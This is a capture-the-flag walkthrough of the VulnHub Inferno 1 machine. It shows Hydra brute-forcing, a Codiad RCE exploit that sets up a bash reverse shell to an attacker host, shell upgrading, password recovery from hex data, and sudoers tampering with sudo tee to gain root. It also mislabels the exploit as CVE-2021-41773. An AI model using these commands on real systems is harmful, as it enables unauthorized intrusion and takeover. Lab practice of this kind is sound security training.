Inferno 1 || VulnHub Complete walkthrough


Hello everyone! Welcome all of my viewers, to this brand-new walkthrough. In today's tutorial, we will be dealing with a vulnerable machine( i.e., Inferno 1 ), categorized as "Easy/Medium" in terms of difficulty.


To begin with, you'll need to download the vulnerable image from the VulnHub website. If you're not familiar with VulnHub yet, feel free to check out the articles on VulnHub playlist.

Vulhub - Vulnerable By Design

Vulhub is a collection of pre-built vulnerable docker environments that are designed for learning and practicing security testing. It provides various intentionally vulnerable web applications and services for hands-on security training.

After you've successfully downloaded the image, it's time to set up the server using VirtualBox, which is a straightforward process.


Settings up

1. First, Launch VirtualBox, go to the "File" menu, and select "Import Appliance". 

2. Import the downloaded " .ova " file. Browse your computer to locate the download file and, click " Next ." 

3. Review the appliance details and settings. You can keep the default settings or make adjustments based on your needs. 

4. Click " Finish " to begin importing.

Once the import is done, the “ inferno ” vulnerable machine will appear in the VirtualBox Manager.  

6. Select the virtual machine and click " Settings ", and change the network adapter to " Host-only adapter ".

Inferno: Host-only adapter

Make sure that both your Kali Linux Machine, which is used for performing attacks, and your vulnerable machine must be connected to the same network.

Kali Linux: Host-only Adapter

Once the setup is done, it's time to start the Virtual Machines. You'll notice that our Vulnerable Machine is all set, and we now have a login prompt waiting for us. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first process of our attack, aimed at identifying the IP Address of our Target Machine using NetDiscover. To do this, open a terminal, and run the following command:

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.159.0/16   |   Screen View: Unique Hosts                                     
      
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.95.101  08:00:27:07:0a:e9      2     120  PCS Systemtechnik GmbH                                 
 192.168.95.107  0a:00:27:00:00:0e      1      60  Unknown vendor                                         
  192.168.95.113  08:00:27:60:22:3a      1      60  PCS Systemtechnik GmbH                                  

From the scan result, we have obtained our target IP address, which is, " 192.168.95.113 ".


Network Discovery with Nmap

Next, we perform a network scan to detect what ports are open. Scanning the Network is an essential part of the enumeration process. This allows us to understand the attack surface and plan targeted attacks. For this purpose, we'll use the popular Nmap tool. Use the following command on the terminal:

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.95.113

Where, 

  • -sC is used to perform a script scan using the default set of scripts
  • ‐sV is used to enable version detection, which will detect, what versions are running on what port.  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-26 01:52 EDT
Nmap scan report for 192.168.95.113
Host is up (0.0018s latency).
Not shown: 957 closed tcp ports (conn-refused)
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp?
22/tcp    open  ssh               OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 82f4d24774862fb49462cd31f6ef51a4 (RSA)
|   256 01e902a3ffff4a7bf2201e0b449d7ff7 (ECDSA)
|_  256 a5dca7b12033f18dc7ddf1a3595dc234 (ED25519)
23/tcp    open  telnet?
25/tcp    open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp    open  domain?
80/tcp    open  http              Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Dante's Inferno
88/tcp    open  kerberos-sec?
106/tcp   open  pop3pw?
110/tcp   open  pop3?
389/tcp   open  ldap?
443/tcp   open  tcpwrapped
464/tcp   open  kpasswd5?
636/tcp   open  ldapssl?
777/tcp   open  multiling-http?
783/tcp   open  spamassassin?
808/tcp   open  ccproxy-http?
873/tcp   open  rsync?
1001/tcp  open  webpush?
1236/tcp  open  bvcontrol?
1300/tcp  open  h323hostcallsc?
2000/tcp  open  cisco-sccp?
2003/tcp  open  finger?
2121/tcp  open  ccproxy-ftp?
2601/tcp  open  zebra?
2602/tcp  open  ripd?
2604/tcp  open  ospfd?
2605/tcp  open  bgpd?
2607/tcp  open  connection?
2608/tcp  open  wag-service?
4224/tcp  open  xtell?
5051/tcp  open  ida-agent?
5432/tcp  open  postgresql?
5555/tcp  open  freeciv?
5666/tcp  open  nrpe?
6346/tcp  open  gnutella?
6566/tcp  open  sane-port?
6667/tcp  open  irc?
|_irc-info: Unable to open connection
8021/tcp  open  ftp-proxy?
8081/tcp  open  blackice-icecap?
8088/tcp  open  radan-http?
9418/tcp  open  git?
10000/tcp open  snet-sensor-mgmt?
10082/tcp open  amandaidx?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.69 seconds
       
┌──(kali㉿kali)-[~]
└─$ 

From the Network scanning, we have spotted several open ports, but among them, two open ports have known version details.

  • Port 22/TCP runs an SSH service , indicating that with valid credentials, gaining login access to the server will be straightforward
  • Port 80/TCP runs an HTTP service , suggesting a vulnerable website is being hosted.


Web Enumeration and Directory Discovery with Gobuster

Now, let's explore the content of the website running on Port 80 . To look at the contents ourselves, open a web browser of your choice, and navigate to the target's IP address in the URL bar at the top of the window.

Upon visiting the webpage, we noticed it contains text and an image; there are no significant contents.

To further enumerate the target URL , we need to perform directory busting to discover hidden or hard-to-access directories and pages. We'll use " gobuster " as our tool of choice, using the following command:

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.95.113/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,js

Where, 

  • gobuster dir is used to instruct gobuster to perform directory busting.
  • -u is used to specify the target URL we want to explore. 
  • -w is used to provide the path to the wordlist containing common directory names to try. 
  • -x is used, if you want to limit the search to specific file types, we can specify them here.

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.95.113/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,php,html,js
[+] Timeout:                 10s
===============================================================
2023/07/26 06:05:02 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 638]
/inferno              (Status: 401) [Size: 461]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1102451 / 1102805 (99.97%)
===============================================================
2023/07/26 06:11:12 Finished
===============================================================
       
┌──(kali㉿kali)-[~]
└─$ 

After performing the directory busting, we discovered 2 crucial web pages. One of them is " /inferno " with a status code of 401. 

Status Code 401: This status code indicates that the client's request could not be completed because it lacks valid authentication credentials for accessing the requested resource. In simple terms, the webpage requires login credentials, and without them, access is restricted.

When I visit the webpage, I am greeted with a login prompt, asking for a username and password. To access the content on this webpage, I need to provide valid login credentials.

First. Let's attempt to log in using some common passwords such as " admin: admin " and " admin: password ". 

Let’s try to capture the interception using Burp Suite. Open Burp Suite and turn on Burp Proxy using Foxy Proxy. 

Go back to the " /inferno " webpage, and type a username and password again.

Unfortunately, we didn't find any helpful information, except for the "GET" request. Now, the only option left is to use brute force to find the username and password. For this purpose, we'll use a tool called "Hydra". 

We use a common username wordlist and the famous " rockyou.txt " wordlist for passwords.

To perform the Brute-force attack , use the following command:

┌──(kali㉿kali)-[~]
└─$ hydra -L ' /home/kali/Downloads/top-usernames-shortlist.txt ' -P ' /usr/share/wordlists/rockyou.txt ' 192.168.95.113 http-get /inferno -t 60
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-26 03:05:06
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 60 tasks per 1 server, overall 60 tasks, 243854783 login tries (l:17/p:14344399), ~4064247 tries per task
[DATA] attacking http-get://192.168.95.113:80/inferno
[80][http-get] host: 192.168.95.113   login: admin   password: dante1
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
       
┌──(kali㉿kali)-[~]
└─$ 

Once the Brute-forcing is successful, we obtain the valid username and its corresponding password. With this information, we can visit the "/inferno" webpage and log into the server to view its content. Now, return to the browser and enter the username and password. 

Upon successful attempt login, you will be directed to the Codiad IDE web login page :

Codiad is a user-friendly, open-source web-based Integrated Development Environment (IDE) that offers a lightweight coding environment accessible through a web browser. With Codiad, developers can effortlessly write, edit, and manage their code using a web interface. This enables seamless project collaboration and flexibility, as developers can work on their projects from any device connected to the internet. 

In another article, we'll explore its installation steps and usage in more detail. Stay tuned!


Brute Forcing a Login Page to Obtain Credentials using Hydra

Let's attempt to log in using the previous password. 

Once we do, we'll access an IDE interface. The interface has a file explorer on the left side, allowing us to click on any file to view its content on the right side.

Let's check if we can remotely access the web server using the Codiad web-based IDE and try to exploit it on the server.

 

Exploiting Codiad for Remote Code Execution

After searching for "Codiad Remote code execution" on Google, I came across a suitable Python exploit on "exploit-db". I will now proceed to download the Python exploit from here.

Exploit Database - CVE-2021-41773: Apache 2.4.49 Path Traversal & RCE

This exploit is for CVE-2021-41773, a vulnerability in Apache HTTP Server 2.4.49. It allows an attacker to perform a path traversal attack and potentially execute remote code on vulnerable servers.


To execute this Python exploit, open a terminal and navigate to the Download directory where the Python exploit is stored, use the " ls " command to list the files and directories in the current location, and run the following command to execute the exploit:

┌──(kali㉿kali)-[~]
└─$ cd Downloads
 
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
49705.py
                                                                                                              
┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py                                                                                   
Usage : 
        python 49705.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
        python 49705.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example : 
        python 49705.py http://localhost/ admin admin 8.8.8.8 8888 linux
        python 49705.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author : 
        WangYihang <[email protected]>
                            
┌──(kali㉿kali)-[~/Downloads]
└─$

After executing the Python file , we can see the usage instructions to run the exploit. We need to input specific information as provided in the usage. Use the following command:

┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py http://192.168.95.113/inferno/ admin dante1 192.168.95.102 4444 linux 

Upon execution, the Python exploit instructs us to run two Netcat commands on another terminal. After executing each netcat command, we need to type "Y", to proceed further.

┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py http://192.168.95.113/inferno/ admin dante1 192.168.95.102 4444 linux             
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/192.168.95.102/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] 

Run two NetCat commands on the terminal: 

Type "Y" to inject the remote code:

[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.95.113 Port 80</address>
</body></html>

[-] Login failed! Please check your username and password.
                             
┌──(kali㉿kali)-[~/Downloads]
└─$

After trying to establish the remote login connection, it failed. This might be because the URL lacks any authentication token or additional credentials. 

However, there is an alternative format where you can directly include the username "admin" and password "dante1" in the URL itself, separated by a colon after "http://". This format is valid and will pass the provided credentials to the target server for authentication.

┌──(kali㉿kali)-[~/Downloads]
└─$ python 49705.py http:// admin:dante1@ 192.168.95.113/inferno/ admin dante1 192.168.95.102 4444 linux

[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/192.168.95.102/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n]

Type "Y" to inject the exploit:

[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...

Here, on this terminal, we have successfully connected to it. 

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4445
listening on [any] 4445 ...
connect to [192.168.95.102] from (UNKNOWN) [192.168.95.113] 34520
bash: cannot set terminal process group (474): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$

However, the remote connection doesn't seem to be stable, so run the Python command to spawn the terminal and use the below command to set the terminal type to xterm.

www-data@Inferno:/var/www/html/inferno/components/filemanager$ python -c "import pty; pty.spawn('/bin/bash')"
<ger$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@Inferno:/var/www/html/inferno/components/filemanager$ export TERM=xterm
<l/inferno/components/filemanager$ export TERM=xterm
www-data@Inferno:/var/www/html/inferno/components/filemanager$

Even though we don't have a stable connection at the moment, we can still gather valuable information, which will help us in attempting an SSH connection . To do this, let's navigate to the " /home " directory and use the " ls " command to list the files and directories present. 

www-data@Inferno:/var/www/html/inferno/components/filemanager$ cd /home
cd /home
www-data@Inferno:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root  root  4096 Dec  6  2020 .
drwxr-xr-x 18 root  root  4096 Dec  6  2020 ..
drwxr-xr-x 11 dante dante 4096 Dec  6  2020 dante
www-data@Inferno:/home$

Among them, we notice a directory named "dante," which strongly suggests that it might be the username associated with the vulnerable server. This discovery can be crucial for further exploration and exploitation.

Now, let's carefully examine the files and directories to see if we can locate the password or any clues that the creator might have left behind. This information could be essential for advancing our exploration and gaining more access to the system.

Next, we'll navigate to the "dante" directory and use the " ls -al " command to list all files, including hidden ones, just like we do on any Linux platform

www-data@Inferno:/home$ cd dante
cd dante
www-data@Inferno:/home/dante$ ls -al
ls -al
total 64
drwxr-xr-x 11 dante dante 4096 Dec  6  2020 .
drwxr-xr-x  3 root  root  4096 Dec  6  2020 ..
-rw-------  1 dante dante   52 Dec  6  2020 .Xauthority
lrwxrwxrwx  1 root  root     9 Dec  6  2020 .bash_history -> /dev/null
-rw-r--r--  1 dante dante  220 Dec  6  2020 .bash_logout
-rw-r--r--  1 dante dante 3526 Dec  6  2020 .bashrc
drwxr-xr-x  3 dante dante 4096 Dec  6  2020 .local
-rw-r--r--  1 dante dante  807 Dec  6  2020 .profile
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Desktop
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Documents
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Downloads
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Music
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Pictures
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Public
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Templates
drwxr-xr-x  2 root  root  4096 Dec  6  2020 Videos
-rw-------  1 dante dante   33 Dec  6  2020 local.txt
www-data@Inferno:/home/dante$ cd Desktop         
cd Desktop
www-data@Inferno:/home/dante/Desktop$ ls -al
ls -al
total 248
drwxr-xr-x  2 root  root    4096 Dec  6  2020 .
drwxr-xr-x 11 dante dante   4096 Dec  6  2020 ..
-rwxr-xr-x  1 root  root   68416 Dec  6  2020 inferno.txt
-rwxr-xr-x  1 root  root   35456 Dec  6  2020 paradiso.txt
-rwxr-xr-x  1 root  root  138728 Dec  6  2020 purgatorio.txt
www-data@Inferno:/home/dante/Desktop$ cd ..
cd ..
www-data@Inferno:/home/dante$ cd Documents
cd Documents
www-data@Inferno:/home/dante/Documents$ ls -al
ls -al
total 472
drwxr-xr-x  2 root  root    4096 Dec  6  2020 .
drwxr-xr-x 11 dante dante   4096 Dec  6  2020 ..
-rwxr-xr-x  1 root  root   27400 Dec  6  2020 beatrice.doc
-rwxr-xr-x  1 root  root   68416 Dec  6  2020 caronte.doc
-rwxr-xr-x  1 root  root  138856 Dec  6  2020 centauro.doc
-rwxr-xr-x  1 root  root   97152 Dec  6  2020 cerbero.doc
-rwxr-xr-x  1 root  root  138728 Dec  6  2020 virgilio.doc
www-data@Inferno:/home/dante/Documents$ cd ..
cd ..
www-data@Inferno:/home/dante$ cd Downloads
cd Downloads
www-data@Inferno:/home/dante/Downloads$ ls -al
ls -al
total 8468
drwxr-xr-x  2 root  root     4096 Dec  6  2020 .
drwxr-xr-x 11 dante dante    4096 Dec  6  2020 ..
-rw-r--r--  1 root  root     1511 Nov  3  2020 .download.dat
-rwxr-xr-x  1 root  root   138728 Dec  6  2020 CantoI.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoII.docx
-rwxr-xr-x  1 root  root    97152 Dec  6  2020 CantoIII.docx
-rwxr-xr-x  1 root  root    68416 Dec  6  2020 CantoIV.docx
-rwxr-xr-x  1 root  root   138856 Dec  6  2020 CantoIX.docx
-rwxr-xr-x  1 root  root    43808 Dec  6  2020 CantoV.docx
-rwxr-xr-x  1 root  root   138856 Dec  6  2020 CantoVI.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoVII.docx
-rwxr-xr-x  1 root  root  3689352 Dec  6  2020 CantoVIII.docx
-rwxr-xr-x  1 root  root    68416 Dec  6  2020 CantoX.docx
-rwxr-xr-x  1 root  root   121464 Dec  6  2020 CantoXI.docx
-rwxr-xr-x  1 root  root   157192 Dec  6  2020 CantoXII.docx
-rwxr-xr-x  1 root  root   213136 Dec  6  2020 CantoXIII.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoXIV.docx
-rwxr-xr-x  1 root  root   146880 Dec  6  2020 CantoXIX.docx
-rwxr-xr-x  1 root  root    97152 Dec  6  2020 CantoXV.docx
-rwxr-xr-x  1 root  root   138728 Dec  6  2020 CantoXVI.docx
-rwxr-xr-x  1 root  root   121464 Dec  6  2020 CantoXVII.docx
-rwxr-xr-x  1 root  root  2746104 Dec  6  2020 CantoXVIII.docx
-rwxr-xr-x  1 root  root    68416 Dec  6  2020 CantoXX.docx
www-data@Inferno:/home/dante/Downloads$

While exploring these directories, we came across an interesting file named " .download.dat ". To see its contents, we use the " cat " command. 

www-data@Inferno:/home/dante/Downloads$ cat .download.dat
cat .download.dat
c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 20 71 75 65 6c 20 56 69 72 67 69 6c 69 6f 20 65 20 71 75 65 6c 6c 61 20 66 6f 6e 74 65 0a 63 68 65 20 73 70 61 6e 64 69 20 64 69 20 70 61 72 6c 61 72 20 73 c3 ac 20 6c 61 72 67 6f 20 66 69 75 6d 65 3f c2 bb 2c 0a 72 69 73 70 75 6f 73 e2 80 99 69 6f 20 6c 75 69 20 63 6f 6e 20 76 65 72 67 6f 67 6e 6f 73 61 20 66 72 6f 6e 74 65 2e 0a 0a c2 ab 4f 20 64 65 20 6c 69 20 61 6c 74 72 69 20 70 6f 65 74 69 20 6f 6e 6f 72 65 20 65 20 6c 75 6d 65 2c 0a 76 61 67 6c 69 61 6d 69 20 e2 80 99 6c 20 6c 75 6e 67 6f 20 73 74 75 64 69 6f 20 65 20 e2 80 99 6c 20 67 72 61 6e 64 65 20 61 6d 6f 72 65 0a 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 63 65 72 63 61 72 20 6c 6f 20 74 75 6f 20 76 6f 6c 75 6d 65 2e 0a 0a 54 75 20 73 65 e2 80 99 20 6c 6f 20 6d 69 6f 20 6d 61 65 73 74 72 6f 20 65 20 e2 80 99 6c 20 6d 69 6f 20 61 75 74 6f 72 65 2c 0a 74 75 20 73 65 e2 80 99 20 73 6f 6c 6f 20 63 6f 6c 75 69 20 64 61 20 63 75 e2 80 99 20 69 6f 20 74 6f 6c 73 69 0a 6c 6f 20 62 65 6c 6c 6f 20 73 74 69 6c 6f 20 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 6f 6e 6f 72 65 2e 0a 0a 56 65 64 69 20 6c 61 20 62 65 73 74 69 61 20 70 65 72 20 63 75 e2 80 99 20 69 6f 20 6d 69 20 76 6f 6c 73 69 3b 0a 61 69 75 74 61 6d 69 20 64 61 20 6c 65 69 2c 20 66 61 6d 6f 73 6f 20 73 61 67 67 69 6f 2c 0a 63 68 e2 80 99 65 6c 6c 61 20 6d 69 20 66 61 20 74 72 65 6d 61 72 20 6c 65 20 76 65 6e 65 20 65 20 69 20 70 6f 6c 73 69 c2 bb 2e 0a 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33 0a
www-data@Inferno:/home/dante/Downloads$


Decoding HEX-Encoded Text with CyberChef

Inside the file, we find HEX-encoded text , which could be a crucial piece of information for gaining access to the server. We'll copy this text and proceed to decode it using Cyberchef, a powerful tool for data manipulation and analysis .

CyberChef - The Cyber Swiss Army Knife

CyberChef is a powerful web application for encrypting, decrypting, and analyzing data. It provides a wide range of cryptographic, encoding, and data manipulation tools, making it a valuable asset for cybersecurity professionals and enthusiasts.


To decode the HEX codes, we'll visit Cyberchef in our web browser. 

Firstly, we'll paste the HEX codes into the Input section and, in the Operation section, we'll search for " HEX " and then drag and drop the "FROM HEX" operation into the Recipe section. 

By checking the Output section, we successfully find the password for the user "dante".

With the valid username and its corresponding password, we are now equipped to gain access to the server using an SSH client tool.


Foothold

Since we have a valid username and password, let's establish a connection using an SSH client tool . Open a terminal and type "ssh" followed by the username and the host IP address. 

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password: 

When prompted, enter the password to establish the connection.

Linux Inferno 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 26 05:50:08 2023 from 192.168.95.102
dante@Inferno:~$ 

The established connection has a stable connection, so let’s take a look at the user flag. 

Type the " ls " command to list the files and directories, and check if there is a user flag available or not. 


dante@Inferno:~$ ls
Desktop  Documents  Downloads  local.txt   Music  Pictures  Public  Templates  Videos
dante@Inferno:~$

Here, we have the user flag on the “ local.txt ” file. Using the “ cat ” command take a look at its content.

dante@Inferno:~$ cat local.txt  
77f***************************************35
dante@Inferno:~$

Now, our main focus is to acquire the root flag. 

dante@Inferno:~$ cd /root     
bash: cd: /root: Permission denied                                                                                               
dante@Inferno:~$

Upon navigating to the "/root" directory to obtain the root flag, we need root permission. It appears to be like that, we lack the necessary permissions to access the root directory. Therefore, let's proceed with Privilege Escalation to elevate our privileges and gain access to the root flag.

 

Privilege Escalation

During privilege escalation, the first step is to gather information about the system and identify potential vulnerabilities or misconfigurations that could allow us to elevate our privileges to gain access to the root level.

Firstly, Enumerate User Permissions to check, the user's privileges and rights on the system. This can be done by running commands like " sudo -l " or " id " to see what commands the current user can run with elevated privileges.

Let me run the “ id ” command to find out the user and group names , and numeric IDs like UID, or group ID of the current user or any other user on the server. 

dante@Inferno:~$ id
uid=1000(dante) gid=1000(dante) groups=1000(dante),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
dante@Inferno:~$

Upon running the " id " command, we discovered that both the UID and group belong to the user "dante".

Let's check the rights and privileges of the current user by running the " sudo -l " command:

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
dante@Inferno:~$

After executing the command, we discover that the user " dante " has sudo privileges specifically for the "tee" application.


tee privilege escalation

The " /usr/bin/tee " is a command-line tool used in Unix-like systems that allows users to read from one source ( like the keyboard or a file ), and then duplicate and send that input to both the screen ( standard output ) and one or more files. The name " tee " comes from its " T " shape, representing the splitting of the input into multiple streams.

In simple terms, when you use " tee " with a command or input, it shows the output on the screen as usual but also saves a copy of that output into specified files. This can be helpful when you want to keep a record of the output while still viewing it in real-time. It's commonly used in scripts and tasks where you need to capture and store data for later use.

After conducting a Google search for " tee privilege escalation ", we came across a helpful blog that explains two methods to use the " tee " command-line tool for privilege escalation.

GTFOBins - tee

GTFOBins is a curated list of Unix binaries that can be exploited to bypass local security restrictions in misconfigured systems. The tee page in GTFOBins provides information on how to use the tee command for privilege escalation and other useful tricks.


Let's proceed step by step to achieve Privilege Escalation:


Method 1. Sudo Misconfiguration Exploiting Specific Binary

First, we will explore the options one by one. Our objective is to gain Privilege Escalation by utilizing the user's permissions in the sudoers file.

Here, is the following command:

dante@Inferno:~$ echo "dante ALL=(ALL) NOPASSWD:ALL" | sudo tee -a "/etc/sudoers"

Where, 

  • The echo command is used to display the specified text on the terminal. Here, we are creating a new line in the sudoers file that grants specific privileges to the user "dante".
  • The vertical bar symbol (|) is called a pipe. It is used to pass the output of the echo command as input to the next command, sudo tee.
  • sudo tee -a "/etc/sudoers" : The tee command is used to read from standard input and write to standard output and files simultaneously. 
  • The -a option is used to append the input to the specified file rather than overwriting it.
dante ALL=(ALL) NOPASSWD:ALL 
dante@Inferno:~$

When you run the entire command, it will add this line to the " /etc/sudoers " file, giving the user "dante" the ability to run any command with sudo privileges without being prompted for a password. However, it is essential to be cautious when modifying the " /etc/sudoers " file, as any mistakes could lead to system instability or security issues.

After successfully executing the command, you can verify the changes using the following command: ` sudo -l `. 

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:                                                                                  
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                       
                             
User dante may run the following commands on Inferno:                                                                            
    (root) NOPASSWD: /usr/bin/tee   
    (ALL) NOPASSWD: ALL      
dante@Inferno:~$

As you can see, the user " dante " now has root permission. 

Now that the user " dante " has root permission, let's access the root flag. To do this, change the current directory to the " /root " directory. 

dante@Inferno:~$ cd /root
-bash: cd: /root: Permission denied                                                                                              
dante@Inferno:~$

However, you might encounter a " permission denied " error. To gain superuser permission, type ` sudo su `. 

dante@Inferno:~$ sudo su     
root@Inferno:/home/dante#

Once you have gained superuser privileges , change the directory again, and now you can access the root directory. 

Let's check if there is a root flag file in the root directory by using the ‘ ls ’ command. 

root@Inferno:/home/dante# cd /root                                                                                               
root@Inferno:~# ls           
proof.txt                    
root@Inferno:~#

Once you've located the root flag file, you can view its contents using the ` cat ` command.

root@Inferno:~# cat proof.txt


 (        )  (          (        )     )   
 )\ )  ( /(  )\ )       )\ )  ( /(  ( /(   
(()/(  )\())(()/(  (   (()/(  )\()) )\())  
 /(_))((_)\  /(_)) )\   /(_))((_)\ ((_)\   
(_))   _((_)(_))_|((_) (_))   _((_)  ((_)  
|_ _| | \| || |_  | __|| _ \ | \| | / _ \  
 | |  | .` || __| | _| |   / | .` || (_) | 
|___| |_|\_||_|   |___||_|_\ |_|\_| \___/ 


Congrats!

You've rooted Inferno!

77f6f3c544ec0811e2d1243e2e0d1835

mindsflee

https://www.buymeacoffe.com/mindsflee

.... ..^.^.^..^.^.^.^^^^!Q!|!!|!!!!!!!||!!!^!|Q!!^!!^!!!Q!^^^^!^^!!^^^!!^!^^^!^.^^|.!!^^^^!^^^^^^!^^^^^^^.^^.^
^.^.^..^^.^^....^^^^^^.^^^QQMMMMMMMMMMMQQ!!!||MMQMQ!^!!|QMQ|!^!|!!!!!!|!!^!!^^!!!!^!|!!^!!!^!^^^!^!!!^^^^!^!^^
....^.^^^.^.^..^.^.^^^.^^^!6MMMMMMMMMMMMMMMMMIQMMMMMMQQOQMMMMQOQOOOOQOOQQQQQQ6|^!^^^!^!|!!!!^!|^!!!^!!!^!!^!^^
...^..^..^.^.^^.^^^^.^^^!^!^!QMMMMMMMMMMMMMMMMMMMMMMMMMMMMQMMMQOQQOQOQOOQOOQOQOOQOOQQQ!!!^!!!!!!^^|^!!!^!!^^!!
........^.^.^.^....^^^.^^^^^!!^IQMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMQOQOQOQOOMQQOQQOOQQOOQQOQOOQO^!^^!!!^^^^^!!|^^!
.^....^.^^^..^..^^.^^^..^!^^^^^IQMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMQMQQQOOQMMQOOOOOOOOQQOQOQOOQOQOQO!^^^!!^.^^^!^^
.^.^.^.^..^......^^.^.^.^^^^^!QMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMQQQQOQOMMMQOOOOOOOOOOQOQQQOOOOQOOQ!^^!^^^^^!^^
.^..^^^.^^..^^^^^.^!..^^^.^^MMMMMMMMMMMQIIMQMMMMMMMMMMMMMMMMMMMMQQQOQOMMMMMQO6OOOOOOOOOOOOOQOOQOOQQQQ^!.!^^!^^
.^..^^..^^^^.^.^^.^....^.OOQMMMQMQMQ6!^.^^|!IOOQMMMMMMMMMMMMMMMMQQOQQQMMMMMMOO6OOOOOOOOOOQOOOQOQQQOOOQQ^^.^^^^
...^.^.^^.^^..^.^^^..^^.^^^^!!^^!^^^!^^^^|!|||I66OMQMMMMMMMMMMMMMMQQQQMMMMMMMOOOO6OOOOOOOOOQOQOQQQOQOQQQ^^^^!^
..^^.^^..^.^^....^^..^^.^.^^.^^^^^.^!!^^|!!|||III66666OI6O6OOOOMMMQQQMMMMMMMMOOOQOO66OO6OOOOOOOOQOOQQQOQQ6^^^^
